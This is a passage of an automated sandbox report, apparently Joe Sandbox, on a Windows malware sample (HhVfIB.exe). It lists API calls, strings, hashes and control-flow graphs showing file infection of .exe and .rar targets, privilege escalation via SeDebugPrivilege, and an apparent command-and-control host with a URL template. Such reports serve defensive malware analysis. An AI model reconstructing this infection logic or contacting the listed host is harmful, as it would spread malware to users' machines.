d12100-d12114 78->80 83 d1213c-d12142 79->83 81 d12116-d1212a 80->81 82 d1212d-d1212e 80->82 81->82 82->78 84 d12144-d12150 83->84 85 d1215c 83->85 87 d12152-d12154 84->87 88 d12157-d1215a 84->88 86 d1215f-d12162 85->86 89 d12181-d12184 86->89 90 d12164-d12171 86->90 87->88 88->83 93 d12186 89->93 94 d1218d-d121ba call d11c68 89->94 91 d12177-d1217e 90->91 92 d1232a-d1232d 90->92 91->89 92->86 93->94 97 d121d3-d1220b call d11c81 call d11c68 94->97 98 d121bc-d121d0 call d11c68 94->98 105 d1221b-d1221e 97->105 106 d1220d-d12218 call d11c68 97->106 98->97 108 d12220-d12223 105->108 109 d12226-d1231a memcpy UnmapViewOfFile FindCloseChangeNotification call d11b8a call d1185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call d11915 105->109 106->105 108->109 116 d1231f-d12328 CloseHandle 109->116 116->27
                    APIs
                    • SetFileAttributesA.KERNEL32(?,00000080,?,00D132B0,00000164,00D12986,?), ref: 00D11EB9
                    • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00D11ECD
                    • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00D11EF3
                    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00D11F07
                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00D11F1D
                    • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 00D1201E
                    • memset.MSVCRT ref: 00D120D8
                    • memset.MSVCRT ref: 00D120EA
                    • memcpy.MSVCRT ref: 00D1222D
                    • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00D12238
                    • FindCloseChangeNotification.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00D1224A
                    • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00D122C6
                    • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00D122CB
                    • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00D122DD
                    • WriteFile.KERNEL32(000000FF,00D14008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00D122F7
                    • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00D1230D
                    • CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00D12322
                    • UnmapViewOfFile.KERNEL32(?,?,00D132B0,00000164,00D12986,?), ref: 00D12340
                    • FindCloseChangeNotification.KERNEL32(?,?,00D132B0,00000164,00D12986,?), ref: 00D1234E
                    • CloseHandle.KERNEL32(000000FF,?,00D132B0,00000164,00D12986,?), ref: 00D12359
                    Memory Dump Source
                    • Source File: 00000001.00000002.1503697158.0000000000D11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000001.00000002.1503661329.0000000000D10000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503742068.0000000000D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503794252.0000000000D14000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503831195.0000000000D16000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_d10000_HhVfIB.jbxd
                    Similarity
                    • API ID: File$CloseView$Pointer$ChangeCreateFindHandleNotificationUnmapWritememset$AttributesFlushMappingmemcpy
                    • String ID:
                    • API String ID: 3349749541-0
                    • Opcode ID: 55d9fbaf4c0f8e6f1e39b9c02e9d4297d554980db1d9d2d21705b498471cd585
                    • Instruction ID: 65b19a7ddf62d91ea58e3a7b601dc84709ea4ac70c369b8c5aea2f4e23a264cf
                    • Opcode Fuzzy Hash: 55d9fbaf4c0f8e6f1e39b9c02e9d4297d554980db1d9d2d21705b498471cd585
                    • Instruction Fuzzy Hash: FDF13975900209FFCB20DFA4E885AEDBBB5FF08314F108529E519A7661DB31AE91CF60
                    Function 00D11973 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 144filesleepmemoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 117 d11973-d1199a PathFileExistsA 118 d119a0-d119aa 117->118 119 d11ac7-d11acc 117->119 120 d119af-d119c2 CreateFileA 118->120 121 d11ad0-d11ad5 119->121 122 d11ace 119->122 123 d119c4-d119d3 Sleep 120->123 124 d11a28-d11a36 GetFileSize 120->124 125 d11af0-d11af6 121->125 126 d11ad7-d11ad9 121->126 122->121 123->120 127 d119d5-d11a0b call d1185b wsprintfA CopyFileA 123->127 128 d11a87-d11a8b 124->128 129 d11a38-d11a3b 124->129 126->125 127->124 141 d11a0d-d11a26 CreateFileA 127->141 132 d11a96-d11a9a 128->132 133 d11a8d-d11a90 FindCloseChangeNotification 128->133 129->128 131 d11a3d-d11a51 VirtualAlloc 129->131 131->128 137 d11a53-d11a57 131->137 134 d11aad-d11ab1 132->134 135 d11a9c 132->135 133->132 139 d11ab3-d11ab6 134->139 140 d11adb-d11ae0 134->140 138 d11aa0-d11aa7 DeleteFileA 135->138 142 d11a80 137->142 143 d11a59-d11a6d ReadFile 137->143 138->134 139->119 144 d11ab8-d11ac1 VirtualFree 139->144 146 d11ae2-d11ae5 140->146 147 d11ae7-d11aec 140->147 141->124 145 d11a9e 141->145 142->128 143->128 148 d11a6f-d11a7e 143->148 144->119 145->138 146->147 147->125 149 d11aee 147->149 148->142 148->143 149->125
                    APIs
                    • PathFileExistsA.SHLWAPI(00D14E5C,00000000,C:\Users\user~1\AppData\Local\Temp\HhVfIB.exe), ref: 00D11992
                    • CreateFileA.KERNEL32(00D14E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00D119BA
                    • Sleep.KERNEL32(00000064), ref: 00D119C6
                    • wsprintfA.USER32 ref: 00D119EC
                    • CopyFileA.KERNEL32(00D14E5C,?,00000000), ref: 00D11A00
                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D11A1E
                    • GetFileSize.KERNEL32(00D14E5C,00000000), ref: 00D11A2C
                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00D11A46
                    • ReadFile.KERNEL32(00D14E5C,00D14E60,00000000,?,00000000), ref: 00D11A65
                    • FindCloseChangeNotification.KERNEL32(000000FF), ref: 00D11A90
                    • DeleteFileA.KERNEL32(?), ref: 00D11AA7
                    • VirtualFree.KERNEL32(00D14E60,00000000,00008000), ref: 00D11AC1
                    Strings
                    • %s%.8X.data, xrefs: 00D119E6
                    • 2, xrefs: 00D119CF
                    • C:\Users\user~1\AppData\Local\Temp\HhVfIB.exe, xrefs: 00D1197C
                    • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00D119DB
                    Memory Dump Source
                    • Source File: 00000001.00000002.1503697158.0000000000D11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000001.00000002.1503661329.0000000000D10000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503742068.0000000000D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503794252.0000000000D14000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503831195.0000000000D16000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_d10000_HhVfIB.jbxd
                    Similarity
                    • API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
                    • String ID: %s%.8X.data$2$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\HhVfIB.exe
                    • API String ID: 2523042076-2116084440
                    • Opcode ID: f506e1716e96e33eca93698a7e3fea8720d8a12c6ee93a24379f138f92519120
                    • Instruction ID: 61c16659cf76c2fca2ab43048588cd7c5e249bc71caa66c7ec25e84b29eb1337
                    • Opcode Fuzzy Hash: f506e1716e96e33eca93698a7e3fea8720d8a12c6ee93a24379f138f92519120
                    • Instruction Fuzzy Hash: 80514C75901219BFCB109F98EC84AEEBFB8EF08354F144569F615E2290CB309E96CB70
                    Function 00D128B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100stringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 150 d128b8-d128ff memset wsprintfA 151 d12905-d1290d 150->151 152 d129db-d129df 150->152 151->152 153 d12913-d12919 151->153 154 d12956-d12965 strrchr 153->154 155 d1291b-d1294c memset wsprintfA call d129e2 153->155 154->152 157 d12967-d12978 lstrcmpiA 154->157 158 d12951 155->158 159 d12988-d12992 lstrcmpiA 157->159 160 d1297a-d12981 call d11e6e 157->160 158->152 159->152 161 d12994-d1299b 159->161 163 d12986 160->163 164 d129ad-d129c9 strstr 161->164 165 d1299d-d129a3 161->165 163->152 167 d129d3-d129d6 call d12692 164->167 168 d129cb-d129d1 call d1239d 164->168 165->164 166 d129a5-d129a7 lstrcpy 165->166 166->164 167->152 168->152
                    APIs
                    • memset.MSVCRT ref: 00D128D3
                    • wsprintfA.USER32 ref: 00D128F7
                    • memset.MSVCRT ref: 00D12925
                    • wsprintfA.USER32 ref: 00D12940
                      • Part of subcall function 00D129E2: memset.MSVCRT ref: 00D12A02
                      • Part of subcall function 00D129E2: wsprintfA.USER32 ref: 00D12A1A
                      • Part of subcall function 00D129E2: memset.MSVCRT ref: 00D12A44
                      • Part of subcall function 00D129E2: lstrlen.KERNEL32(?), ref: 00D12A54
                      • Part of subcall function 00D129E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00D12A6C
                      • Part of subcall function 00D129E2: strrchr.MSVCRT ref: 00D12A7C
                      • Part of subcall function 00D129E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00D12A9F
                      • Part of subcall function 00D129E2: lstrlen.KERNEL32(Documents and Settings), ref: 00D12AAE
                      • Part of subcall function 00D129E2: memset.MSVCRT ref: 00D12AC6
                      • Part of subcall function 00D129E2: memset.MSVCRT ref: 00D12ADA
                      • Part of subcall function 00D129E2: FindFirstFileA.KERNEL32(?,?), ref: 00D12AEF
                      • Part of subcall function 00D129E2: memset.MSVCRT ref: 00D12B13
                    • strrchr.MSVCRT ref: 00D12959
                    • lstrcmpiA.KERNEL32(00000001,exe), ref: 00D12974
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1503697158.0000000000D11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000001.00000002.1503661329.0000000000D10000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503742068.0000000000D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503794252.0000000000D14000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503831195.0000000000D16000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_d10000_HhVfIB.jbxd
                    Similarity
                    • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                    • String ID: %s%s$%s\$C:\Users\user~1\AppData\Local\Temp\$exe$rar
                    • API String ID: 3004273771-4092107658
                    • Opcode ID: adc1ab6d4148a9da270e76e5ae2130e6b638e357e594b47e8fdf8bea0e7e5f5f
                    • Instruction ID: 1228e8c78d7434ad91f91716be010a2a19a90788a9b0a029367917e8bfb2cc71
                    • Opcode Fuzzy Hash: adc1ab6d4148a9da270e76e5ae2130e6b638e357e594b47e8fdf8bea0e7e5f5f
                    • Instruction Fuzzy Hash: 8031B57198030C7BDB20AB68FC85FEA37AC9B14310F080452F585E2581EEB6DAD58FB0
                    Function 00D11638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70stringsynchronizationthreadCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetTempPathA.KERNEL32(00000104,C:\Users\user~1\AppData\Local\Temp\,?,00000005,00000000), ref: 00D1164F
                    • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 00D1165B
                    • GetModuleFileNameA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\HhVfIB.exe,00000104), ref: 00D1166E
                    • CreateThread.KERNEL32(00000000,00000000,Function_00001099,00000000,00000000,00000000), ref: 00D116AC
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 00D116BD
                      • Part of subcall function 00D1139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user~1\AppData\Local\Temp\HhVfIB.exe), ref: 00D113BC
                      • Part of subcall function 00D1139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00D113DA
                      • Part of subcall function 00D1139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00D11448
                    • lstrcpy.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\HhVfIB.exe), ref: 00D116E5
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1503697158.0000000000D11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000001.00000002.1503661329.0000000000D10000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503742068.0000000000D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503794252.0000000000D14000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503831195.0000000000D16000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_d10000_HhVfIB.jbxd
                    Similarity
                    • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                    • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\HhVfIB.exe$C:\Windows\system32$Documents and Settings
                    • API String ID: 123563730-532410751
                    • Opcode ID: aa7892d358faa4f03868188f39e8d2dc1ecf35acb624ec65c0d2844df4fa9e62
                    • Instruction ID: 64a5727b1118ba9b41784b317c07cd3a07c10d519313fa7d24d9e4291a6d18f2
                    • Opcode Fuzzy Hash: aa7892d358faa4f03868188f39e8d2dc1ecf35acb624ec65c0d2844df4fa9e62
                    • Instruction Fuzzy Hash: 6C118175641314BBDF206BA5BD49EDB3EADEB4A361F048015F309D12A0DE7189C5CBB1
                    Function 00D11000 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 60fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 205 d11000-d11023 CreateFileA 206 d11092-d11096 205->206 207 d11025-d11055 GetFileSize CreateFileMappingA MapViewOfFile 205->207 208 d11057-d1105f 207->208 209 d1107b-d11085 207->209 212 d11061-d1106e call d117d0 208->212 213 d11074-d11075 UnmapViewOfFile 208->213 210 d11087-d1108b CloseHandle 209->210 211 d1108d-d11091 CloseHandle 209->211 210->211 211->206 212->213 213->209
                    APIs
                    • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,?,http://%s:%d/%s/%s,00D110E8,?), ref: 00D11018
                    • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,75A38400,?,http://%s:%d/%s/%s,00D110E8,?), ref: 00D11029
                    • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00D11038
                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,http://%s:%d/%s/%s,00D110E8,?), ref: 00D1104B
                    • UnmapViewOfFile.KERNEL32(00000000,?,http://%s:%d/%s/%s,00D110E8,?), ref: 00D11075
                    • CloseHandle.KERNEL32(?,?,http://%s:%d/%s/%s,00D110E8,?), ref: 00D1108B
                    • CloseHandle.KERNEL32(00000000,?,http://%s:%d/%s/%s,00D110E8,?), ref: 00D1108E
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1503697158.0000000000D11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000001.00000002.1503661329.0000000000D10000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503742068.0000000000D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503794252.0000000000D14000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503831195.0000000000D16000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_d10000_HhVfIB.jbxd
                    Similarity
                    • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                    • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                    • API String ID: 1223616889-3273462101
                    • Opcode ID: 3b8f50dd543880418432c0a345557f85e77c49973c6245e97a62f736bf25dec1
                    • Instruction ID: 006e7d085aa2e1cf227bf2d4ea2969508cb6f814b6562fed7f276f19bd631627
                    • Opcode Fuzzy Hash: 3b8f50dd543880418432c0a345557f85e77c49973c6245e97a62f736bf25dec1
                    • Instruction Fuzzy Hash: 7B015E7560035CBFE6305F60AC88EABBAECDB48799F054629F345E2190DA705E858A70
                    Function 00D12C48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50threadCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 376 d12c48-d12c75 memset call d11973 379 d12cb2-d12cb9 376->379 380 d12c77-d12c7f 376->380 383 d12cc8-d12ccc 379->383 384 d12cbb-d12cc2 VirtualFree 379->384 381 d12c81-d12c8b 380->381 382 d12c8f-d12cac CreateThread WaitForMultipleObjects 380->382 381->382 382->379 384->383
                    APIs
                    • memset.MSVCRT ref: 00D12C57
                      • Part of subcall function 00D11973: PathFileExistsA.SHLWAPI(00D14E5C,00000000,C:\Users\user~1\AppData\Local\Temp\HhVfIB.exe), ref: 00D11992
                      • Part of subcall function 00D11973: CreateFileA.KERNEL32(00D14E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00D119BA
                      • Part of subcall function 00D11973: Sleep.KERNEL32(00000064), ref: 00D119C6
                      • Part of subcall function 00D11973: wsprintfA.USER32 ref: 00D119EC
                      • Part of subcall function 00D11973: CopyFileA.KERNEL32(00D14E5C,?,00000000), ref: 00D11A00
                      • Part of subcall function 00D11973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D11A1E
                      • Part of subcall function 00D11973: GetFileSize.KERNEL32(00D14E5C,00000000), ref: 00D11A2C
                      • Part of subcall function 00D11973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00D11A46
                      • Part of subcall function 00D11973: ReadFile.KERNEL32(00D14E5C,00D14E60,00000000,?,00000000), ref: 00D11A65
                    • CreateThread.KERNEL32(00000000,00000000,00D12B8C,00000000,00000000,00000000), ref: 00D12C99
                    • WaitForMultipleObjects.KERNEL32(00000001,00D116BA,00000001,000000FF,?,00D116BA,00000000), ref: 00D12CAC
                    • VirtualFree.KERNEL32(00D00000,00000000,00008000,C:\Users\user~1\AppData\Local\Temp\HhVfIB.exe,00D14E5C,00D14E60,?,00D116BA,00000000), ref: 00D12CC2
                    Strings
                    • C:\Users\user~1\AppData\Local\Temp\HhVfIB.exe, xrefs: 00D12C69
                    Memory Dump Source
                    • Source File: 00000001.00000002.1503697158.0000000000D11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000001.00000002.1503661329.0000000000D10000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503742068.0000000000D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503794252.0000000000D14000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503831195.0000000000D16000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_d10000_HhVfIB.jbxd
                    Similarity
                    • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                    • String ID: C:\Users\user~1\AppData\Local\Temp\HhVfIB.exe
                    • API String ID: 2042498389-398092939
                    • Opcode ID: 4030820502f0966685f8ddbace0784bc5d220866eb0d45462cfe4d2f6aaf131b
                    • Instruction ID: b951a8879596f8b7926b997596b192154c2fc6edb86822cb3284644610f43a66
                    • Opcode Fuzzy Hash: 4030820502f0966685f8ddbace0784bc5d220866eb0d45462cfe4d2f6aaf131b
                    • Instruction Fuzzy Hash: D901B1716012207ED6109B95BC0AEEB7EADEF01B60F008110B604DA281DDA099A4C7F0
                    Function 00D114E1 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 385 d114e1-d114fb 386 d11541-d11547 385->386 387 d114fd-d11510 GetModuleHandleA 385->387 390 d11573-d11574 call d11638 386->390 391 d11549-d1154c 386->391 388 d11512-d11518 387->388 389 d1151a-d11535 VirtualQuery 387->389 388->386 392 d11537-d11539 389->392 393 d1153b 389->393 397 d11579-d1157a ExitProcess 390->397 394 d11569-d11570 391->394 395 d1154e-d11555 391->395 392->386 392->393 393->386 395->394 398 d11557-d11566 call d11af9 395->398 398->394
                    APIs
                    • GetModuleHandleA.KERNEL32(00000000), ref: 00D11504
                    • VirtualQuery.KERNEL32(00D114E1,?,0000001C), ref: 00D11525
                    • ExitProcess.KERNEL32 ref: 00D1157A
                    Memory Dump Source
                    • Source File: 00000001.00000002.1503697158.0000000000D11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000001.00000002.1503661329.0000000000D10000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503742068.0000000000D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503794252.0000000000D14000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503831195.0000000000D16000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_d10000_HhVfIB.jbxd
                    Similarity
                    • API ID: ExitHandleModuleProcessQueryVirtual
                    • String ID:
                    • API String ID: 3946701194-0
                    • Opcode ID: 55cbb39f8c5b73846dd9b2e246a7e8578ffdce539bff0d7ca28fb885ebac02d2
                    • Instruction ID: e76ea0563ee88c804e7726f054a774147cdba9b715863e1409db77fe1d723a6b
                    • Opcode Fuzzy Hash: 55cbb39f8c5b73846dd9b2e246a7e8578ffdce539bff0d7ca28fb885ebac02d2
                    • Instruction Fuzzy Hash: 0C115E79A01315FFDF10DFA5B8856FD77B8EB84710B18802AF602D2251EE348982DB70
                    Function 00D11915 Relevance: 4.5, APIs: 3, Instructions: 41timeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 401 d11915-d11922 402 d11924-d11926 401->402 403 d11928-d1192c 401->403 404 d1196e-d11970 402->404 405 d1194f-d11952 403->405 406 d1192e-d1194d memset GetFileTime 403->406 405->404 408 d11954-d11960 SetFileTime 405->408 407 d11966-d11968 406->407 409 d1196a 407->409 410 d1196c 407->410 408->407 409->410 410->404
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.1503697158.0000000000D11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000001.00000002.1503661329.0000000000D10000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503742068.0000000000D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503794252.0000000000D14000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503831195.0000000000D16000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_d10000_HhVfIB.jbxd
                    Similarity
                    • API ID: FileTimememset
                    • String ID:
                    • API String ID: 176422537-0
                    • Opcode ID: 3d6777c02771e995d186a9948c50868fd9b0d14a9b920303f5a86714a19e3f0b
                    • Instruction ID: f44745e34d5c61169ed48ea5df5b57f6ae9b2bbb3fb730e0a5e1a5a0e290a479
                    • Opcode Fuzzy Hash: 3d6777c02771e995d186a9948c50868fd9b0d14a9b920303f5a86714a19e3f0b
                    • Instruction Fuzzy Hash: C3F03136200219BBDB209E26EC04AE777ACAB54361F048526F676D5590EB30D685CEB0
                    Function 00D16158 Relevance: 2.6, APIs: 2, Instructions: 58memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 411 d16158-d16189 VirtualFree 412 d1618c-d16192 411->412 413 d160c7-d160cf 412->413 414 d16198-d161b0 VirtualFree 412->414 413->412 415 d160d5-d160f8 VirtualAlloc 413->415 416 d161b2-d161b4 414->416 417 d161ba-d161c8 414->417 434 d160fa-d160fc call d166c8 415->434 435 d160fe-d16106 415->435 416->417 419 d16243-d16251 417->419 420 d161ca-d161d7 417->420 423 d16253 419->423 424 d16264-d1626f 419->424 422 d161dd-d161e0 420->422 422->419 428 d161e2-d161f2 422->428 425 d16255-d16258 423->425 426 d16271-d16276 424->426 425->424 430 d1625a-d16262 425->430 431 d16389-d163b1 VirtualProtect 426->431 432 d1627c-d16289 426->432 429 d161f5-d161fe 428->429 436 d16200-d16203 429->436 437 d1620c-d16219 429->437 430->425 438 d163b7-d163ba 431->438 453 d16292-d16298 432->453 454 d1628b 432->454 434->435 442 d16155-d16189 VirtualFree 435->442 443 d16108-d1611d 435->443 440 d16205-d16208 436->440 441 d1621b-d16228 436->441 445 d16238-d1623f 437->445 446 d163fc-d163ff VirtualProtect 438->446 447 d163bc-d163c2 438->447 448 d1622a-d16236 440->448 449 d1620a 440->449 441->445 442->412 450 d1611f-d16121 443->450 445->429 451 d16241 445->451 452 d16400-d16416 446->452 447->447 455 d163c4 447->455 448->445 449->445 457 d16151-d16154 450->457 458 d16123 450->458 451->422 459 d16420-d16425 452->459 460 d16418-d1641d 452->460 461 d162a2-d162ac 453->461 454->453 455->446 462 d163c6-d163cf 455->462 457->442 458->457 463 d16125-d16128 458->463 464 d162b1-d162c8 461->464 465 d162ae 461->465 466 d163d1 462->466 467 d163d4-d163d8 462->467 470 d16134-d1613b 463->470 471 d1612a-d1612e 463->471 472 d16373-d16384 464->472 473 d162ce-d162d4 464->473 465->464 466->467 468 d163da 467->468 469 d163dd-d163e1 467->469 468->469 474 d163e3 469->474 475 d163e7-d163fa VirtualProtect 469->475 480 d16130-d16132 470->480 481 d1613d-d1614f 470->481 471->470 471->480 472->426 478 d162d6-d162d9 473->478 479 d162da-d162f1 473->479 474->475 475->438 475->446 478->479 483 d162f3-d162f9 479->483 484 d16365-d1636e 479->484 480->450 481->450 485 d16314-d16326 483->485 486 d162fb-d1630f 483->486 484->461 488 d16328-d1634a 485->488 489 d1634c-d16360 485->489 487 d16426-d164a9 486->487 497 d16519-d1651c 487->497 498 d164ab-d164c0 487->498 488->484 489->487 499 d16583-d16587 497->499 500 d1651d-d1651e 497->500 504 d164c2 498->504 505 d16535-d16537 498->505 502 d16588-d1658b 499->502 503 d16522-d16533 500->503 506 d165a1-d165a3 502->506 507 d1658d-d1658f 502->507 503->505 510 d164c5-d164cd 504->510 511 d164f8 504->511 508 d16539 505->508 509 d1659a 505->509 512 d16591-d16593 507->512 513 d165b4 508->513 514 d1653b-d16541 508->514 515 d1659b-d1659d 509->515 516 d16542-d16545 510->516 517 d164cf-d164d4 510->517 518 d164fa-d164fe 511->518 519 d1656c-d1656f 511->519 512->515 520 d16595 512->520 525 d165be-d165db 513->525 514->516 515->512 521 d1659f 515->521 522 d1654d-d16550 516->522 523 d16517-d16518 517->523 524 d164d6-d164d9 517->524 526 d16500 518->526 527 d16572 518->527 519->527 520->509 521->502 522->525 530 d16552-d16556 522->530 523->497 524->522 531 d164db-d164f5 524->531 533 d165dd-d165f6 525->533 526->503 528 d16502 526->528 529 d16573-d16576 527->529 528->529 534 d16504-d16513 528->534 535 d16578-d1657a 529->535 530->535 536 d16558-d16569 530->536 531->511 537 d165f7-d16608 533->537 534->505 538 d16515 534->538 535->533 539 d1657c 535->539 536->519 538->523 539->537 540 d1657e-d1657f 539->540 540->499
                    APIs
                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00D160DF
                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00D16189
                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00D161A5
                    Memory Dump Source
                    • Source File: 00000001.00000002.1503831195.0000000000D16000.00000040.00000001.01000000.00000004.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000001.00000002.1503661329.0000000000D10000.00000002.00000001.01000000.00000004.sdmpDownload File
